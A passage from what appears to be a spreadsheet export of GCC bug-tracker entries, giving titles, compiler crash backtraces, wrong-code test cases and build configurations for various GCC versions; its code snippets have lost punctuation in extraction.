ms-4.7-i386-rtems4.7-gcc-newlib-gcc3.3.2newlib1.11.0/gcc-3.3.2/gcc/ada/../../inc
lude -I./../.. -I/users/rtems/src/packages/BUILD/rtems-4.7-i386-rtems4.7-gcc-new
lib-gcc3.3.2newlib1.11.0/gcc-3.3.2/gcc/ada/../.. -I../.. \
      -DPREFIX=\/opt/rtems-4.7\ /users/rtems/src/packages/BUILD/rtems-4.7-i386
-rtems4.7-gcc-newlib-gcc3.3.2newlib1.11.0/gcc-3.3.2/gcc/ada/../prefix.c
In file included from /users/rtems/src/packages/BUILD/rtems-4.7-i386-rtems4.7-gc
c-newlib-gcc3.3.2newlib1.11.0/gcc-3.3.2/gcc/prefix.c:69:
/users/rtems/src/packages/BUILD/rtems-4.7-i386-rtems4.7-gcc-newlib-gcc3.3.2newli
b1.11.0/gcc-3.3.2/gcc/system.h:117:22: strings.h: No such file or directory
make[2]: *** [prefix.o] Error 1
Apparent cause is prefix.c including config.h which subsequently includes
auto-host.h.
auto-host.h contains the configure-detected values for the build-host not for
the target as building gnatlib assumes
=&gt; gnatlib is being compiled by the cross-compiler using the configuation
values having been detected for the build-host
=&gt; gnatlib can not be cross-compiled for *any* target.</t>
  </si>
  <si>
    <t>GCC-58836</t>
  </si>
  <si>
    <t>[c++11] ICE with wrong usage of initializer list in non-type template argument</t>
  </si>
  <si>
    <t>The following invalid code snippet (compiled with -std=c++11 or -std=c++0x for older compilers) triggers an ICE since GCC 4.4.0 (when initializer lists were introduced):
===============================================
template struct A
template struct A {}
A a
===============================================
bug.cc:5:11: internal compiler error: in unify at cp/pt.c:17829
 A a
           ^
0x5d22ef unify
        ../../gcc/gcc/cp/pt.c:17829
0x5d158b unify
        ../../gcc/gcc/cp/pt.c:17651
0x5d387e get_class_bindings
        ../../gcc/gcc/cp/pt.c:18378
0x5d44ea most_specialized_class
        ../../gcc/gcc/cp/pt.c:18623
0x5e52f0 instantiate_class_template_1
        ../../gcc/gcc/cp/pt.c:8704
0x5e52f0 instantiate_class_template(tree_node*)
        ../../gcc/gcc/cp/pt.c:9236
0x676d9b complete_type(tree_node*)
        ../../gcc/gcc/cp/typeck.c:132
0x5601b9 start_decl_1(tree_node* bool)
        ../../gcc/gcc/cp/decl.c:4679
0x589ef1 start_decl(cp_declarator const* cp_decl_specifier_seq* int tree_node* tree_node* tree_node**)
        ../../gcc/gcc/cp/decl.c:4642
0x662d1a cp_parser_init_declarator
        ../../gcc/gcc/cp/parser.c:16514
0x6645ff cp_parser_simple_declaration
        ../../gcc/gcc/cp/parser.c:11054
0x647f80 cp_parser_block_declaration
        ../../gcc/gcc/cp/parser.c:10935
0x66f17e cp_parser_declaration
        ../../gcc/gcc/cp/parser.c:10832
0x66de9a cp_parser_declaration_seq_opt
        ../../gcc/gcc/cp/parser.c:10718
0x66f7b6 cp_parser_translation_unit
        ../../gcc/gcc/cp/parser.c:3990
0x66f7b6 c_parse_file()
        ../../gcc/gcc/cp/parser.c:30970
0x78c623 c_common_parse_file()
        ../../gcc/gcc/c-family/c-opts.c:1046
Please submit a full bug report [etc.]</t>
  </si>
  <si>
    <t>GCC-28137</t>
  </si>
  <si>
    <t>make check gets 10 FAIL reports with gcc.dg/c99-typespec-1.c</t>
  </si>
  <si>
    <t>Configured as follows:
unset ARCH SRC TARGET
ARCH=amd64
SRC=/usr/src/gcc-4.1.1
ARCH=${ARCH:-i486}
TARGET=${TARGET:-$ARCH-pc-linux-gnu}
(time nice $SRC/configure \
  --prefix=/usr/local64/gcc402 \
  --enable-shared \
  --enable-threads=posix \
  --enable-__cxa_atexit \
  --disable-checking \
  --with-gnu-ld \
  --target=${TARGET} \
  --host=${TARGET} \
  --build=${TARGET} \
  )2&gt;&amp;1|tee heeconf
unset ARCH SRC TARGET
then make bootstrap make -j 8 check gives these 10 failures:
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int int (test for errors line 1157)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int long (test for errors line 1158)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int float (test for errors line 1159)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int double (test for errors line 1160)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int signed (test for errors line 1161)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int unsigned (test for errors line 1162)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int _Bool (test for errors line 1163)
FAIL: gcc.dg/c99-typespec-1.c unsigned long long int _Complex (test for errors line 1164)
FAIL: gcc.dg/c99-typespec-1.c (test for excess errors)
FAIL: gcc.dg/visibility-11.c scan-assembler memcpy@PLT
System is dual Opteron with 4GB RAM (3.5GB usable owing to stupid BIOS)</t>
  </si>
  <si>
    <t>duncan_roe</t>
  </si>
  <si>
    <t>GCC-47370</t>
  </si>
  <si>
    <t>[4.6 Regression] error: invalid first operand of MEM_REF</t>
  </si>
  <si>
    <t>regehr@home:~/volatile/bugs/tmp346$ current-gcc -O2 -c small.c
small.c: In function â€˜func_115â€™:
small.c:27:1: error: invalid first operand of MEM_REF
&amp;l_233[0]
small.c:18:3: note: in statement
# .MEM_6 = VDEF 
MEM[(struct S0 *)
small.c:27:1: internal compiler error: verify_stmts failed
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
regehr@home:~/volatile/bugs/tmp346$ current-gcc -v
Using built-in specs.
COLLECT_GCC=current-gcc
COLLECT_LTO_WRAPPER=/mnt/z/z/compiler-install/gcc-r169046-install/libexec/gcc/i686-pc-linux-gnu/4.6.0/lto-wrapper
Target: i686-pc-linux-gnu
Configured with: ../configure --with-libelf=/usr/local --enable-lto --prefix=/mnt/z/z/compiler-install/gcc-r169046-install --program-prefix=r169046- --enable-languages=cc++
Thread model: posix
gcc version 4.6.0 20110120 (experimental) (GCC) 
regehr@home:~/volatile/bugs/tmp346$ cat small.c
struct S0
{
  int f4
}
void func_23 (void)
{
  int i
  for (i = 0 i &lt; 1) 
}
struct S0 func_105 (void)
{
  struct S0 l_111 = {
    99
  }
  return l_111
}
void func_115 (void)
{
  struct S0 l_233[1]
  l_233[0] = func_105 ()
  func_105 ()
  func_23 ()
}</t>
  </si>
  <si>
    <t>GCC-9628</t>
  </si>
  <si>
    <t>[sparc] ICE in gcc 3.4 20030203 sparc{64}-linux: bfd/linker.c:2738: internal compiler error: output_operand: invalid expression as operand</t>
  </si>
  <si>
    <t>When trying to bootstrap/build gcc and binutils joined cvs trunks
using a previous such build as bootstrap I get an ICE...
chj@sparky:/usr/local/src/gcc-binutils/trunk/objdir/bfd$ gdb /usr/local/gcc-binutils/bin/gcc
GNU gdb Red Hat Linux (5.2-2)
Copyright 2002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sparc-redhat-linux...
(gdb) set args -DHAVE_CONFIG_H -I. -I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd -I. -D_GNU_SOURCE -I.
+-I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd -I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/../include
+-I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/../intl -I../intl -W -Wall -Wstrict-prototypes -Wmissing-prototypes -g -O2+-c /usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/linker.c  -fPIC -DPIC -o .libs/linker.o
(gdb) r
Starting program: /usr/local/gcc-binutils/bin/gcc -DHAVE_CONFIG_H -I. -I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd -I.
+-D_GNU_SOURCE -I. -I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd
+-I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/../include -I/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/../intl
+-I../intl -W -Wall -Wstrict-prototypes -Wmissing-prototypes -g -O2 -c
+/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/linker.c  -fPIC -DPIC -o .libs/linker.o
/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/linker.c: In function `default_data_link_order':
/usr/local/src/gcc-binutils/trunk/gcc-binutils/bfd/linker.c:2738: internal compiler error: output_operand: invalid expression as+operand
Please submit a full bug report
with preprocessed source if appropriate.
See  for instructions.
Program exited with code 01.
(gdb) bt
No stack.
(gdb) q
Release:
3.4 (experimental) 20030203 -- 20030306
Environment:
Aurora SPARC Linux on SS20 (sun4m) and U1 (sun4u)
How-To-Repeat:
   well compile bfd/linker.c using a recent binutils</t>
  </si>
  <si>
    <t>christian.joensson</t>
  </si>
  <si>
    <t>GCC-65305</t>
  </si>
  <si>
    <t>[5 regression] FAIL: gcc.target/i386/chkp-strchr.c and FAIL: gcc.target/i386/pr63995-2.c</t>
  </si>
  <si>
    <t>On Linux/x86 r221149 gave
FAIL: gcc.target/i386/chkp-strchr.c (internal compiler error)
FAIL: gcc.target/i386/chkp-strchr.c (test for excess errors)
FAIL: gcc.target/i386/pr63995-2.c (internal compiler error)
FAIL: gcc.target/i386/pr63995-2.c (test for excess errors)
[hjl@gnu-6 gcc]$ ./xgcc -B./ -O2 -g -fcheck-pointer-bounds -mmpx /export/gnu/import/git/sources/gcc/gcc/testsuite/gcc.target/i386/pr63995-2.c
/export/gnu/import/git/sources/gcc/gcc/testsuite/gcc.target/i386/pr63995-2.c: In function â€˜init.chkpâ€™:
/export/gnu/import/git/sources/gcc/gcc/testsuite/gcc.target/i386/pr63995-2.c:28:1: internal compiler error: Segmentation fault
 }
 ^
0xd23b34 crash_signal
	/export/gnu/import/git/sources/gcc/gcc/toplev.c:383
0xe334f1 gimple_code
	/export/gnu/import/git/sources/gcc/gcc/gimple.h:1553
0xe33f66 gimple_call_num_args
	/export/gnu/import/git/sources/gcc/gcc/gimple.h:2843
0xe42a81 ipa_sra_check_caller
	/export/gnu/import/git/sources/gcc/gcc/tree-sra.c:5039
0x83bfb8 cgraph_node::call_for_symbol_thunks_and_aliases(bool (*)(cgraph_node* void*) void* bool bool)
	/export/gnu/import/git/sources/gcc/gcc/cgraph.c:2192
0xe42f0c ipa_sra_preliminary_function_checks
	/export/gnu/import/git/sources/gcc/gcc/tree-sra.c:5134
0xe42fb6 ipa_early_sra
	/export/gnu/import/git/sources/gcc/gcc/tree-sra.c:5163
0xe43306 execute
	/export/gnu/import/git/sources/gcc/gcc/tree-sra.c:5268
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
[hjl@gnu-6 gcc]$ 
r221131 is OK.</t>
  </si>
  <si>
    <t>GCC-50162</t>
  </si>
  <si>
    <t>[4.5 Regression] Wrong vectorization</t>
  </si>
  <si>
    <t>Following testcase results in wrong vectorization:
--cut here--
double a[256]
int b[256]
unsigned short c[256]
extern long lrint (double)
void bar(void)
{
  int i
  for (i=0 i&lt;256 ++i)
    {
      b[i] = lrint (a[i])
      c[i] += c[i]
    }
}
--cut here--
gcc -O2 -ffast-math -ftree-vectorize -m32 -msse2 -mfpmath=sse
.L2:
	cvtpd2dq	a+16(%eax4) %xmm0
	cvtpd2dq	a(%eax4) %xmm1
	cvtpd2dq	a+32(%eax4) %xmm2
	punpcklqdq	%xmm0 %xmm1
	punpcklqdq	%xmm2 %xmm0
	movdqa	%xmm0 b+16(%eax%eax)
	movdqa	c(%eax) %xmm0
	paddw	%xmm0 %xmm0
	movdqa	%xmm1 b(%eax%eax)
	movdqa	%xmm0 c(%eax)
	addl	$16 %eax
	cmpl	$512 %eax
	jne	.L2
One cvtpd2dq is missing.
4.6.1. compiles to:
.L2:
	cvtpd2dq	a+16(%eax4) %xmm0
	cvtpd2dq	a(%eax4) %xmm1
	cvtpd2dq	a+48(%eax4) %xmm2
	punpcklqdq	%xmm0 %xmm1
	cvtpd2dq	a+32(%eax4) %xmm0
	punpcklqdq	%xmm2 %xmm0
	movdqa	%xmm0 b+16(%eax%eax)
	movdqa	c(%eax) %xmm0
	paddw	%xmm0 %xmm0
	movdqa	%xmm1 b(%eax%eax)
	movdqa	%xmm0 c(%eax)
	addl	$16 %eax
	cmpl	$512 %eax
	jne	.L2
The problem is already in .optimized tree dump:
  vect_var_.13_22 = MEM[symbol: a index: ivtmp.41_17 step: 4 offset: 0B]
  vect_var_.14_24 = MEM[symbol: a index: ivtmp.41_17 step: 4 offset: 16B]
  vect_var_.15_26 = MEM[symbol: a index: ivtmp.41_17 step: 4 offset: 32B]
  vect_var_.17_29 = __builtin_ia32_vec_pack_sfix (vect_var_.13_22 vect_var_.14_24)
  vect_var_.17_30 = __builtin_ia32_vec_pack_sfix (vect_var_.14_24 vect_var_.15_26)
  MEM[symbol: b index: ivtmp.41_17 step: 2 offset: 0B] = vect_var_.17_29
  MEM[symbol: b index: ivtmp.41_17 step: 2 offset: 16B] = vect_var_.17_30
  vect_var_.26_38 = MEM[symbol: c index: ivtmp.41_17 offset: 0B]
  vect_var_.27_39 = vect_var_.26_38 + vect_var_.26_38
  MEM[symbol: c index: ivtmp.41_17 offset: 0B] = vect_var_.27_39
Please note there is no access to offset 48B.
Gcc 4.6.1 generates:
  vect_var_.39 = __builtin_ia32_vec_pack_sfix (MEM[symbol: a index: ivtmp.69 step: 4] MEM[symbol: a index: ivtmp.69 step: 4 offset: 16])
  vect_var_.77 = __builtin_ia32_vec_pack_sfix (MEM[symbol: a index: ivtmp.69 step: 4 offset: 32] MEM[symbol: a index: ivtmp.69 step: 4 offset: 48])
  MEM[symbol: b index: ivtmp.69 step: 2] = vect_var_.39
  MEM[symbol: b index: ivtmp.69 step: 2 offset: 16] = vect_var_.77
  vect_var_.52 = MEM[symbol: c index: ivtmp.69]
  MEM[symbol: c index: ivtmp.69] = [plus_expr] vect_var_.52 + vect_var_.52</t>
  </si>
  <si>
    <t>GCC-142</t>
  </si>
  <si>
    <t>Anonyous unions prevent proper linking.</t>
  </si>
  <si>
    <t xml:space="preserve"> Original-Message-Id: 
 Date: Wed 20 Oct 1999 01:40:16 -0700
 Problem description:
   If a class is defined within an anonymous union the functions
 within contain the index number of the anonymous union within them.
 This number in not unique as it it increments for each class.  Thus
 if a different number of anonymous unions appear functions will not
 link.
 Affected platforms and versions:
   platforms all version 2.95 
 Switchs needed to cause error:
   None. Default behavior demonstrate error. 
 Sample:  (This must be in 3 seperate files to demonstrate improper
 linking)
 --------------------------test.h--------------------------------
 struct A
   {
     union {
       void *v
       struct B {
	 static void foo()
	} b
     }
   }
 --------------------------test1.cc------------------------------
 struct C
   {
    union {  
     void *i
     int j
    }
   }
 #include test.h
 main()
   {
     A::B::foo()
   }
 --------------------------test2.cc------------------------------
 #include test.h
 void A::B::foo() {}
 ----------------------------------------------------------------
 compile with:  c++ test1.cc test2.cc
 Sample Output:
 &gt; c++ test1.cc test2.cc
 /tmp/ccftbB1R.o: In function `main':
 /tmp/ccftbB1R.o(.text+0x7): undefined reference to `A::._1::B::foo(void)'
 collect2: ld returned 1 exit status
 A::B::foo is properly defined.  This should have linked.
 --Karl
Release:
2.95.2 3.0</t>
  </si>
  <si>
    <t>GCC-987</t>
  </si>
  <si>
    <t>gcc does not compile this with -O2.</t>
  </si>
  <si>
    <t>$ gcc -O2 tracking.i
tracking.c: In function `update_tracking':
tracking.c:112: Unable to generate reloads for:
(insn 645 643 646 (set (reg/v:SF 9 st(1))
        (float_truncate:SF (reg/v:XF 8 st(0)))) 91 {*truncxfsf2_2} (insn_list 632 (nil))
    (expr_list:REG_DEAD (reg/v:XF 8 st(0))
        (nil)))
tracking.c:112: Internal compiler error in find_reloads at reload.c:3493
Please submit a full bug report.
See  for instructions.
Release:
gcc version 2.96 20000731 (Red Hat Linux 7.0)</t>
  </si>
  <si>
    <t>marten_stromberg</t>
  </si>
  <si>
    <t>GCC-7557</t>
  </si>
  <si>
    <t>gcc-3.1.1 (debian/i386): wrong code with -O2 / bitfields / pointer aliasing</t>
  </si>
  <si>
    <t>The attached sample program produces wrong output when
compiled with -O2. Output produced when compiled with-O is
correct.
I'm attaching the C source as well as compressed preprcessor output.
$ gcc-3.1 -Wall -O2 bug.c -o bug
$ ./bug
8 8
0xbeaddeef 0x34127856
0xa307401c 0x12345678
$ gcc-3.1 -Wall -O bug.c -o bug
$ ./bug
8 8
0xbeaddeef 0x34127856
0xdeadbeef 0x12345678
$ gcc-3.1 -v -Wall -O2 bug.c -o bug
Reading specs from /usr/lib/gcc-lib/i386-linux/3.1.1/specs
Configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1.1ds3/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-__cxa_atexit --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
Thread model: posix
gcc version 3.1.1
 /usr/lib/gcc-lib/i386-linux/3.1.1/cc1 -lang-c -v -D__GNUC__=3 -D__GNUC_MINOR__=1 -D__GNUC_PATCHLEVEL__=1 -D__ELF__ -Dunix -D__gnu_linux__ -Dlinux -D__ELF__ -D__unix__ -D__gnu_linux__ -D__linux__ -D__unix -D__linux -Asystem=posix -D__OPTIMIZE__ -D__STDC_HOSTED__=1 -Acpu=i386 -Amachine=i386 -Di386 -D__i386 -D__i386__ -D__tune_i386__ bug.c -quiet -dumpbase bug.c -O2 -Wall -version -o /home/js/tmp/ccA9puym.s
GNU CPP version 3.1.1 (cpplib) (i386 Linux/ELF)
GNU C version 3.1.1 (i386-linux)
	compiled by GNU C version 3.1.1.
ignoring nonexistent directory /usr/i386-linux/include
#include ... search starts here:
#include  search starts here:
 /usr/local/include
 /usr/lib/gcc-lib/i386-linux/3.1.1/include
 /usr/include
End of search list.
 as -V -Qy -o /home/js/tmp/ccA3HBCF.o /home/js/tmp/ccA9puym.s
GNU assembler version 2.12.90.0.15 (i386-linux) using BFD version 2.12.90.0.15 20020717 Debian GNU/Linux
 /usr/lib/gcc-lib/i386-linux/3.1.1/collect2 --eh-frame-hdr -m elf_i386 -dynamic-linker /lib/ld-linux.so.2 -o bug /usr/lib/gcc-lib/i386-linux/3.1.1/../../../crt1.o /usr/lib/gcc-lib/i386-linux/3.1.1/../../../crti.o /usr/lib/gcc-lib/i386-linux/3.1.1/crtbegin.o -L/usr/lib/gcc-lib/i386-linux/3.1.1 -L/usr/lib/gcc-lib/i386-linux/3.1.1/../../.. /home/js/tmp/ccA3HBCF.o -lgcc -lgcc_eh -lc -lgcc -lgcc_eh /usr/lib/gcc-lib/i386-linux/3.1.1/crtend.o /usr/lib/gcc-lib/i386-linux/3.1.1/../../../crtn.o
Release:
3.1.1 (Debian testing/unstable)
Environment:
System: Linux hell 2.4.19pre1 #3 Sun May 12 19:15:17 CEST 2002 i686 unknown unknown GNU/Linux
Architecture: i686
host: i386-pc-linux-gnu
build: i386-pc-linux-gnu
target: i386-pc-linux-gnu
configured with: /mnt/data/gcc-3.1/gcc-3.1-3.1.1ds3/src/configure -v --enable-languages=cc++javaf77protoobjcada --prefix=/usr --mandir=/usr/share/man --infodir=/usr/share/info --with-gxx-include-dir=/usr/include/c++/3.1 --enable-shared --with-system-zlib --enable-long-long --enable-nls --without-included-gettext --enable-clocale=gnu --enable-__cxa_atexit --enable-threads=posix --enable-java-gc=boehm --enable-objc-gc i386-linux
How-To-Repeat:
/* gcc-3.1.1 bug: wrong results with -O2 */
#include 
#include 
struct foo {
	unsigned int a: 8
                     b:24
	unsigned int c:16
                     d:16
}
struct foo_swabbed {
	unsigned int b:24
                     a: 8
	unsigned int d:16
                     c:16
}
static void swab_foo(struct foo *f)
{
        struct foo_swabbed fs = *(struct foo_swabbed *) f
        unsigned int *p = (unsigned int *)
        p[0] = __swab32(p[0])
        p[1] = __swab32(p[1])
        f-&gt;a = fs.a
        f-&gt;b = fs.b
        f-&gt;c = fs.c
        f-&gt;d = fs.d
}
int main(void)
{
	struct foo f = { 0xef 0xbeadde  0x7856 0x3412 }
        unsigned int *p = (unsigned int *)
	printf(%u %u\n sizeof(struct foo) sizeof(struct foo_swabbed))
	printf(%#010x %#010x\n p[0] p[1])
	swab_foo(
	printf(%#010x %#010x\n p[0] p[1])
	return 0
}</t>
  </si>
  <si>
    <t>js</t>
  </si>
  <si>
    <t>GCC-58423</t>
  </si>
  <si>
    <t>[ARM]ICE with shrink-wrap-sibcall.c on a15/neon/hard</t>
  </si>
  <si>
    <t>GCC ICEed with shrink-wrap-sibcall.c on a15 with below command line:
./arm-none-eabi-gcc -O2 -marm -mcpu=cortex-a15 -mfpu=neon -mfloat-abi=hard shrink-wrap-sibcall.c -S -o shrink-wrap-sibcall.S -fno-diagnostics-show-caret -fdiagnostics-color=never -O2 -g
ICE msg is:
shrink-wrap-sibcall.c: In function 'baz':
shrink-wrap-sibcall.c:26:1: internal compiler error: in maybe_record_trace_start at dwarf2cfi.c:2218
0x82bfe41 maybe_record_trace_start
	../../gcc/gcc/dwarf2cfi.c:2218
0x82c22f2 scan_trace
	../../gcc/gcc/dwarf2cfi.c:2395
0x82c2a25 create_cfi_notes
	../../gcc/gcc/dwarf2cfi.c:2549
0x82c2a25 execute_dwarf2_frame
	../../gcc/gcc/dwarf2cfi.c:2904
0x82c2a25 execute
	../../gcc/gcc/dwarf2cfi.c:3400
Please submit a full bug report
with preprocessed source if appropriate.
Please include the complete backtrace with any bug report.
See  for instructions.
GCC is at revision r202599 and the ICE relates to a15/neon/hard-abi no matter how it is configured for arm.</t>
  </si>
  <si>
    <t>amker.cheng</t>
  </si>
  <si>
    <t>GCC-45225</t>
  </si>
  <si>
    <t>gcc accepts ill-formed template code combining Variadic Templates and Partial specialization</t>
  </si>
  <si>
    <t>gcc accepts following code.
Basically this code specify template arguments to ordinary template parameter pack(i.e. non template template parameter pack).
// given this primary template
template 
class Foo { } 
// gcc accepts this parcial specialization
// If I use template keyword.
template 
class Foo ... &gt;
{ } 
// gcc also accepts this. the difference is position of template keyword.
template 
class Foo ... &gt;
{ } 
This must be ill-formed.
The template keyword for the typename-specifier is for nested-name-specifier. Types is not.
Types is not a template template parameter pack yet it takes template arguments if I use broken typename-specifier-like syntax.
When I found this I wanted to write class template Foo which can be instantiated like this:
Foo&lt;
    std::tuple
    std::tuple
    std::tuple
&gt; foo 
It accepts any number of std::tuple types(or whatever class templates) with each std::tuple take any number of template arguments in any type.
The obvious implementation of this is using template template parameter pack in partial specialization.
template 
class Foo { }
template &lt;
    template  class ... Types
    typename ... Params
&gt;
class Foo ... &gt;
{ } 
But I happened to write above ordinary template parameter pack version.
And found this bug.</t>
  </si>
  <si>
    <t>GCC-4410</t>
  </si>
  <si>
    <t>3.0 and 3.0.1 ICE in change_address at emit-rtl.c:1635</t>
  </si>
  <si>
    <t>ICE on attached code when compiled using -O. Problem
goes away with -O0 or -O2.
GCC 2.95.2 compiles the code without problems.
&gt; d3.i:1084: Internal compiler error in change_address at emit-rtl.c:1635
&gt; Please submit a full bug report
&gt; with preprocessed source if appropriate.
&gt; See  for instructions.
Release:
gcc 3.0 and 3.0.1 sparc-sun-solaris2.8
How-To-Repeat:
compile with -c -O</t>
  </si>
  <si>
    <t>GCC-49042</t>
  </si>
  <si>
    <t>[C++0x] wrong protected when using template and decltype</t>
  </si>
  <si>
    <t>Created attachment 24282
the preprocessed file of tmpl_decl.cpp
preprocessed file is in the attachment.
the source code is shown as below:
==========================================================================
template class W{
protected:
	T* p
public:
	W()
	{
		p=new T()
	}
	~W()
	{
		if(p)
			delete p
	}
	auto test1(int i) -&gt; decltype(p-&gt;get(i))
	{
		return p-&gt;get(i)
	}
	templateint test2(Ta&amp;&amp; i)
	{
		return p-&gt;get(i)
	}
#if 1// bug in g++ 4.4 4.5 &amp; 4.6
#define TESTCASE3
	templateauto test3(Ta&amp;&amp; i) -&gt; decltype(p-&gt;get(i))
	{
		return p-&gt;get(i)
	}
#endif
#if 1 // bug in g++ 4.4 &amp; 4.5
#define TESTCASE4
	// this is an ugly workground for 4.6
	templateauto test4(Ta&amp;&amp; i) -&gt; decltype(((T*)0)-&gt;get(i))
	{
		return p-&gt;get(i)
	}
#endif
}
class A
typedef W B
class A{
protected:
	int _i
public:
	A():_i(0)
	{}
	A(int i):_i(i)
	{}
	int get(int i)const
	{
		return _i-i
	}
}
int main()
{
	int s
	B b
	s+=b.test1(0)
	s+=b.test2(0)
#ifdef TESTCASE3
	s+=b.test3(0)
#endif
#ifdef TESTCASE4
	s+=b.test4(0)
#endif
	return s
}
==========================================================================
While test1() test2() are all ok for g++ -std=c++0x from 4.4 to 4.6
test3() is rejected by all and test4() is accepted only by 4.6.
G++4.6 gives a strange error message for test3() such as tmpl_decl.cpp:3:5: error: â€˜A* W::pâ€™ is protected while it accepts p in test1().
btw g++ 4.4 4.5 both reject test3() and test4() with other error messages so this is not a regression error.
output of g++ -v -save-temps -std=c++0x -c tmpl_decl.cpp
==========================================================================
Using built-in specs.
COLLECT_GCC=g++
COLLECT_LTO_WRAPPER=/usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/lto-wrapper
Target: x86_64-linux-gnu
Configured with: ../src/configure -v --with-pkgversion='Ubuntu 4.6.0-3~ppa1' --with-bugurl=file:///usr/share/doc/gcc-4.6/README.Bugs --enable-languages=cc++fortranobjcobj-c++go --prefix=/usr --program-suffix=-4.6 --enable-shared --enable-multiarch --with-multiarch-defaults=x86_64-linux-gnu --enable-linker-build-id --with-system-zlib --libexecdir=/usr/lib/x86_64-linux-gnu --without-included-gettext --enable-threads=posix --with-gxx-include-dir=/usr/include/c++/4.6 --libdir=/usr/lib/x86_64-linux-gnu --enable-nls --with-sysroot=/ --enable-clocale=gnu --enable-libstdcxx-debug --enable-libstdcxx-time=yes --enable-plugin --enable-objc-gc --disable-werror --with-arch-32=i686 --with-tune=generic --enable-checking=release --build=x86_64-linux-gnu --host=x86_64-linux-gnu --target=x86_64-linux-gnu
Thread model: posix
gcc version 4.6.1 20110409 (prerelease) (Ubuntu 4.6.0-3~ppa1) 
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++0x' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/cc1plus -E -quiet -v -D_GNU_SOURCE tmpl_decl.cpp -mtune=generic -march=x86-64 -std=c++0x -fpch-preprocess -fstack-protector -o tmpl_decl.ii
ignoring nonexistent directory /usr/local/include/x86_64-linux-gnu
ignoring nonexistent directory /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/../../../../../x86_64-linux-gnu/include
#include ... search starts here:
#include  search starts here:
 /usr/include/c++/4.6
 /usr/include/c++/4.6/x86_64-linux-gnu
 /usr/include/c++/4.6/backward
 /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/include
 /usr/local/include
 /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/include-fixed
 /usr/include/x86_64-linux-gnu
 /usr/include
End of search list.
COLLECT_GCC_OPTIONS='-v' '-save-temps' '-std=c++0x' '-c' '-shared-libgcc' '-mtune=generic' '-march=x86-64'
 /usr/lib/x86_64-linux-gnu/gcc/x86_64-linux-gnu/4.6.1/cc1plus -fpreprocessed tmpl_decl.ii -quiet -dumpbase tmpl_decl.cpp -mtune=generic -march=x86-64 -auxbase tmpl_decl -std=c++0x -version -fstack-protector -o tmpl_decl.s
GNU C++ (Ubuntu 4.6.0-3~ppa1) version 4.6.1 20110409 (prerelease) (x86_64-linux-gnu)
        compiled by GNU C version 4.6.1 20110409 (prerelease) GMP version 4.3.2 MPFR version 3.0.0-p8 MPC version 0.9
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=62982
GNU C++ (Ubuntu 4.6.0-3~ppa1) version 4.6.1 20110409 (prerelease) (x86_64-linux-gnu)
        compiled by GNU C version 4.6.1 20110409 (prerelease) GMP version 4.3.2 MPFR version 3.0.0-p8 MPC version 0.9
GGC heuristics: --param ggc-min-expand=63 --param ggc-min-heapsize=62982
Compiler executable checksum: 9b2d061a0b3f0ab5a4eef825b71a3b00
tmpl_decl.cpp: In function â€˜int main()â€™:
tmpl_decl.cpp:3:5: error: â€˜A* W::pâ€™ is protected
tmpl_decl.cpp:74:14: error: within this context
==========================================================================</t>
  </si>
  <si>
    <t>lenx.wei</t>
  </si>
  <si>
    <t>GCC-47271</t>
  </si>
  <si>
    <t>[4.6 Regression] if-conversion removes a test (if) the function generates invalid outputs</t>
  </si>
  <si>
    <t>I tried to compile Python 3.2 (r87949) with gcc (version 4.6.0 20100908) on AMD64: Python does fail with an assertion error or another strange crash. The problem comes from a loop in Python/peephole.c. Compiled with -O1 it works fine. Compiled with -O1 -ftree-vectorize the functions generates strange (invalid) outputs.
gcc-4.6 -O1:
-------------------------------------
0x0000000000480991 :  mov    %eax%edx
0x0000000000480993 :  sub    %esi%edx
0x0000000000480995 :  mov    %edx(%r12%rax4)
0x0000000000480999 :  movzbl 0x0(%rbp%rax1)%edx
0x000000000048099e :  cmp    $0x9%dl
0x00000000004809a1 :  jne    0x4809a8 
0x00000000004809a3 :  add    $0x1%esi
0x00000000004809a6 :  jmp    0x4809b2 
0x00000000004809a8 :  mov    $0x3%ecx
0x00000000004809ad :  cmp    $0x59%dl
0x00000000004809b0 :  ja     0x4809b7 
0x00000000004809b2 :  mov    $0x1%ecx
0x00000000004809b7 :  add    %rcx%rax
0x00000000004809ba :  cmp    %rax%rdi
0x00000000004809bd :  jg     0x480991 
-------------------------------------
gcc-4.6 -O1 -ftree-vectorize
-------------------------------------
0x0000000000480991 :  mov    %eax%ecx
0x0000000000480993 :  sub    %edx%ecx
0x0000000000480995 :  mov    %ecx(%r12%rax4)
0x0000000000480999 :  movzbl 0x0(%rbp%rax1)%ecx
